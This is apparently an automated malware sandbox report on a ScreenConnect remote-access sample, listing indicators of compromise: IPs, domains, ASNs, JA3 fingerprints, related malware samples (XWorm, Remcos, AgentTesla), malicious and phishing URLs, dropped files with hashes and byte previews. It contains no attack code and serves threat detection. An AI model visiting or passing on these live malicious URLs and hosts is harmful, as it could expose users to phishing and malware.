79.110.49.196	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://magical-variation-300980.framer.app/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://www.netigate.se/a/s.aspx?s=1236726X450166796X50614	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://tayakay.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	test5.exe	Get hash	malicious	XWorm	Browse	192.229.221.95
	https://linke.to/pkmlogistics	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://metrics.send.hotmart.com/v2/events/click/64ec6af4-7b81-4abf-9e97-fe7d70d45255?d=1nFwG70sgZqlXE	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/telop.zip	Get hash	malicious	Unknown	Browse	192.229.221.95
	QT2Q1292300924.vbs	Get hash	malicious	FormBook	Browse	192.229.221.95
upphelp.top	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OTAVANET-ASCZ	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	Statement.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.42
	bin homebots io.bat	Get hash	malicious	Unknown	Browse	79.110.49.144
	yJrZoOsgfl.exe	Get hash	malicious	Unknown	Browse	79.110.49.144
	IMKssbDprn.exe	Get hash	malicious	Unknown	Browse	79.110.49.144
	WBmC56ADQF.lnk	Get hash	malicious	Unknown	Browse	79.110.49.144
	uScqjqUS1m.exe	Get hash	malicious	Unknown	Browse	79.110.49.144
	CVSIyqGKKK.exe	Get hash	malicious	Unknown	Browse	79.110.49.144
	Bill_Of_Lading_Shipping_Documents_Invoice_Awb_CI_PL000000000000000000000.bat	Get hash	malicious	Remcos, GuLoader	Browse	79.110.49.132
	st.exe	Get hash	malicious	XWorm	Browse	79.110.49.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	https://metrics.send.hotmart.com/v2/events/click/64ec6af4-7b81-4abf-9e97-fe7d70d45255?d=1nFwG70sgZqlXE	Get hash	malicious	Unknown	Browse	79.110.49.196
	Shipping documents 000029393994400000000000.exe	Get hash	malicious	AgentTesla	Browse	79.110.49.196
	file.exe	Get hash	malicious	Unknown	Browse	79.110.49.196
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	79.110.49.196
	Bnnebgers.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	79.110.49.196
	QT2Q1292300924.vbs	Get hash	malicious	FormBook	Browse	79.110.49.196
	NTS_eTaxInvoice.html.vbs	Get hash	malicious	Remcos, GuLoader	Browse	79.110.49.196
	RFQ-5120240930 VENETA PESCA SRL.vbs	Get hash	malicious	VIP Keylogger	Browse	79.110.49.196
	Faktura_82666410_1361590461#U00b7pdf.vbe	Get hash	malicious	Remcos, GuLoader	Browse	79.110.49.196

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-BILL#226.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-BILL#226.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Statement.exe	Get hash	malicious	ScreenConnect Tool	Browse
	https://nvoice0077.s3.ap-southeast-2.amazonaws.com/Viewer.html	Get hash	malicious	ScreenConnect Tool	Browse
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse
	6Zx9GI028y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	4ZVhm9dOfO.exe	Get hash	malicious	ScreenConnect Tool	Browse
	y4FSQMICGJ.exe	Get hash	malicious	ScreenConnect Tool	Browse
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-BILL#226.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-BILL#226.Client.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Statement.exe	Get hash	malicious	ScreenConnect Tool	Browse
	https://nvoice0077.s3.ap-southeast-2.amazonaws.com/Viewer.html	Get hash	malicious	ScreenConnect Tool	Browse
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse
	6Zx9GI028y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	4ZVhm9dOfO.exe	Get hash	malicious	ScreenConnect Tool	Browse
	y4FSQMICGJ.exe	Get hash	malicious	ScreenConnect Tool	Browse
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7263264562397785
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0L:9JZj5MiKNnNhoxuq
MD5:	9D09BE311380E7A6589B179013FFD3F8
SHA1:	1D807C991CDD4A9291D2B9AD83A207A6270C684D
SHA-256:	2BB4FB107D24BBC2665864AF6D2AA9D037BF82413CF86F79027A27C023193ABC
SHA-512:	B0B645FF058C3AD2A5900E18A61BD9A41C82567BF8EACD9255B2B564D03C59F4F48D2B95A7A920B747E612AD4BEE4291C6D0B17B389AE910B8D386AE3EF6F2F2
Malicious:	false
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x6651b3af, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7556069048977871
Encrypted:	false
SSDEEP:	1536:FSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:FazaSvGJzYj2UlmOlOL
MD5:	429CD79E4C7A8792ABA72045D0CE8642
SHA1:	C01A75DA962F5118CB0C8E275D33327E32B7281A
SHA-256:	B25DAB7358BFAA1B7770FD8E82B0055009E5567FA8D1F274B3244E834D93287A
SHA-512:	61D2D4869B11BDD27640C697A840AB08A99CC8615845BCEDCF35285FD83466BE329B0134445720F11B394840899753AF0CE36E4C0D505254906E54B9A860FF9D
Malicious:	false
Preview:	fQ..... .......7.......X\...;...{......................0.e......!...{?.;....\|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{......................................;....\|.................S...;....\|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08008519067864
Encrypted:	false
SSDEEP:	3:t6YepUnTNaAPaU1lzWRqlluxmO+l/SNxOf:MzpMNDPaUrWUgmOH
MD5:	CB9BF9647D9A423314F6E098E4ED15DC
SHA1:	8A75EA8B278F0437BD55C75739FA61A1A6FE09BF
SHA-256:	604280617AF31B5CEA957D2CCA554E8B6274938C9DBAC7AF56CAEFD0B8BE69A4
SHA-512:	75E918872717DA5B1B80F376D07F8DF6F3BA6D36404B852FC4E01DD38D4E5821F617417F993AD208102EA6C217BB4A145D9038A1EB4590F21F0EC1EE4DCD83E8
Malicious:	false
Preview:	(../.....................................;...{..;....\|...!...{?..........!...{?..!...{?..g...!...{?.................S...;....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mrKs8EKXbz.exe_521cdd52a6fecd7688fcd95b479bab4279f873c5_70ec60d9_0d489e28-b0d3-456e-8b7e-ac7fad451ec2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9126704543522927
Encrypted:	false
SSDEEP:	96:QwFINVsMhqvGXyf5QXIDcQvc6QcEVcw3cE/H+HbHg/Jg+OgBCXEYcI+1si2T4Npr:NYVIy0BU/AjC0ozuiFwZ24IO87
MD5:	A05F3F1B42CBAB1720680C78D6E4AF98
SHA1:	2641B1FDE58299B81E4B7638DFA4B291074502A2
SHA-256:	924248C6B816510713242202241FC5257807C617F22B8DEEF6E9CABBE6DF3429
SHA-512:	2763D0C92856817A913416EACC6F851C158F7F2309833A2DC1462482B063EAA81B15C4CBE1D08F0555177CC53EA30A7C7FAB3595562161A9CA067667FBA6BD54
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.1.7.2.3.9.9.5.2.4.2.4.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.1.7.2.4.0.0.3.2.1.1.2.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.4.8.9.e.2.8.-.b.0.d.3.-.4.5.6.e.-.8.b.7.e.-.a.c.7.f.a.d.4.5.1.e.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.f.f.8.0.4.6.-.4.2.d.5.-.4.4.5.c.-.b.a.0.c.-.e.8.1.c.d.4.8.0.3.a.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.r.K.s.8.E.K.X.b.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.d.4.-.0.0.0.1.-.0.0.1.5.-.c.1.6.f.-.e.e.0.f.3.3.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.0.c.5.9.3.0.c.3.3.b.7.d.4.9.a.1.c.2.b.0.c.3.9.e.6.3.f.c.5.7.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.a.c.1.f.a.8.6.1.f.7.2.f.1.2.a.3.0.8.5.2.b.f.f.9.0.8.5.b.2.b.e.8.5.2.a.7.d.5.2.!.m.r.K.s.8.E.K.X.b.z...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3946.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Sep 30 12:19:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	1.6556347122771717
Encrypted:	false
SSDEEP:	192:MbepIRH0XddGdFOhI/jT9E1SLZ/zj+4EZwM9+DzCTTtITdH26thCpD:IRKYohI/iYVbjfcGCftQUp
MD5:	4BD243F7B106FCB4F52A0F99B20AE840
SHA1:	B9D6B1FA977B539E61E116E5E7A3FAA716A42BED
SHA-256:	374F7DF568E12D1ABA6E63C86F845AEA1514AAA3A085D24CED86C7B373A8A467
SHA-512:	FBA4115D184CAA712836236EA48D302EBF6BDF8731A6C9F7540C3836D39F3BD666AC4E5CD10772D84116DA7D69B73582997A0C371D3AC985A4FDEE3E288E498F
Malicious:	false
Preview:	MDMP..a..... .......o..f.........................................;..........T.......8...........T............!..P$.......... ...........................................................................................eJ..............GenuineIntel............T...........l..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AED.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	3.7013150847902057
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+LU616Y2DOSU9CNgmfHwWrVwprf89bdjsfOfm:R6lXJ+Y616YDSU9CNgmfHwWrVddIfX
MD5:	86CB67538CF2073D9CC475F0E9F4BA1B
SHA1:	50B56859BF5FB5DEB56000842C0C5830FAFA6FA2
SHA-256:	B8D98C659612467395957D4449FC527348D0D41220537DF610B0905334A1999B
SHA-512:	5C1F33B93729343E733FA8F3F6455347AB9F156C8DA1A17A3EC59858239CD756DFC2D11DF63927134E5DD96246AD75C34E04B942FA8D661167E80C830FA7921C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B1D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4593
Entropy (8bit):	4.480315396886298
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEJg77aI9iVWpW8VYWYm8M4JNEFRX+q8PK56KuK1d:uIjfCI7Ek7VaJQXrduK1d
MD5:	38C50A676FE271A2182BCFC099164AD7
SHA1:	D92B06C7143CA7E30A73227A60E6476BB9D973EC
SHA-256:	14184BFCBA2ED2BDDDE1F1236863F6F4EEE43E72CDE2C883437C9860EC491DC4
SHA-512:	AD3C9AE71C5B8B886AAF058113B348571C2492623CA17A0C0C097F94A01A907BB7724CE1B4293EDA3B07C520E43F5586FD424C799A756771D9579DF5A09472C1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="522922" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B3A.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83964
Entropy (8bit):	3.0572996339548975
Encrypted:	false
SSDEEP:	1536:T+XLH9juMdCKc2acDQWBDbihWRsVLdDYjB2ISgCIwzMLyul1D3wJJohb+iUA:T+XLH9juMdCKc2acDQWBDbihWRsVLdDe
MD5:	7E140EE172C354F65515A46509F420FE
SHA1:	0D44795194D58A1B9337231CDFEFE1E5AC509B13
SHA-256:	AB7812D75EE308C6868A56BB82FCA909005E0F423C1FF1CAC61ECCA16CDCF7F4
SHA-512:	67105F95B9BAE01950585741D7C1B3848EE4D1AC233385847DD6B5078B08614D629AA16BC9C260966E6B1F2C52128F8FE35986BB9C188A4978E67B6B9B393B70
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B89.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6843138093428345
Encrypted:	false
SSDEEP:	96:TiZYWRkEqnYjSY5Y9WmHrUYEZ+Nt8icH6bx6wKu9Ua0kKMgGBo/I5i3:2ZDRVeuy1kZa0kKMgGBoQ5i3
MD5:	E32F5DA1E05796D6420B023AFC79D263
SHA1:	B8AB2423C77E7DC1BBA4CF7E440C1CCFA2D072B5
SHA-256:	E87378749EB1EB2381A7934AD9600059C036B78B38B0116C3CF34DF774E68960
SHA-512:	3B5B156CB4CF27E279A3BCE76D11D1F97E486D8681C8D3B165FF8724A7126F488EA396554BD7E2DF5F83127A75D4F49E003ACB9A01C72F905231187B5FF08778
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	4770
Entropy (8bit):	7.946747821604857
Encrypted:	false
SSDEEP:	96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
MD5:	1BFE591A4FE3D91B03CDF26EAACD8F89
SHA1:	719C37C320F518AC168C86723724891950911CEA
SHA-256:	9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
SHA-512:	02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
Malicious:	false
Preview:	MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.)......Y@...(..).R."E..D^6........u....\|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O...R..........D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;\|.h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.z..2.Py...A..s...z..@...4..........4.....Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._\|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.592020902028236
Encrypted:	false
SSDEEP:	12:5onfZH6/c5RlRtBfQt6/ysbmsCDvgZDoY+ra2wD3pUsOdrbNo7iiErABd:5ip6/cdZs6/ynT4loY+ra2T7d2iCd
MD5:	9DCFFE281E496656A7415A8903A33BA8
SHA1:	336B08088F0978FFFABB4FCD1D3304B4A32496B9
SHA-256:	0FC33C6C69C4D88EDDF60A99E31E49A8E7E59DB712B03BA72D0E7DECBDECEDE3
SHA-512:	38BAF80ACC69F87FB49E6A53B4119FADD222852FB1B468010D749FE6307E1B35060E72F3BB5A659A68BDCD65CD5A2DC314D4C1404699FEA832C64827311B7F59
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20240928184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240928184215Z....20241005184215Z0....H.............T./\|.0..E.4..n.,At..$..y....S.HC.GI..ec-.kS.rf..]..c..w.x!...q..&.U.<.+....N..]mC.J..iN/i.......$gq..$.4.p... ....2.....r^..z_%f.y.A.?YJ.......xi..h.W.a3l.....h.I...=M..>/.mz..o.Y"`X......B'N..3...<.(F........L....T..}..s....p.U.n......n...S...@.+..N.e.....[9......;\...b...C....El.^l91...q.@.)...mG...m.M..i>..}...IN\.,'h..tE......]+g.n..[...'>..lDjd .0.h.........&9.S..z..o....%EP...G.;...r..9.-C3N.w.tY.0....c>..h...t.VN..X.O.Q...Q. .wl..l.M..R......;.i..:Q/..0J...9...U...fs'..h..n.s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

